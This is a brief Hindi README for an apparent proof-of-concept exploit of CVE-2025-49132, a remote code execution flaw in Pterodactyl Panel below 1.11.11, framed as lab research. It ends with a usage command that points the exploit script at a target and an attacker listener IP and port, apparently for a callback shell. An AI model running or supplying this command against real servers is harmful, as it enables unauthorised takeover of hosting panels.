
यह स्क्रिप्ट Pterodactyl Panel < 1.11.11 में रिमोट कोड निष्पादन भेद्यता का शोषण करती है।
इस भंडार में CVE-2025-49132 के लिए एक प्रमाण-अवधारणा (PoC) है, जो Pterodactyl Panel < 1.11.11 को प्रभावित करने वाली एक दूरस्थ कोड निष्पादन (RCE) भेद्यता है। यह PoC अनुसंधान और शैक्षिक उद्देश्यों के लिए एक नियंत्रित प्रयोगशाला वातावरण में विकसित और परीक्षण किया गया था।
यह भेद्यता एक अनुरोध हैंडलर में उपयोगकर्ता-नियंत्रित इनपुट के अपर्याप्त सत्यापन से उत्पन्न होती है, जो अनपेक्षित बैकएंड इंटरैक्शन की अनुमति देती है। कुछ शर्तों के तहत, यह दूरस्थ कमांड निष्पादन का कारण बन सकती है।
python3 exploit.py -t <target> -l <listener_ip> -p <listener_port>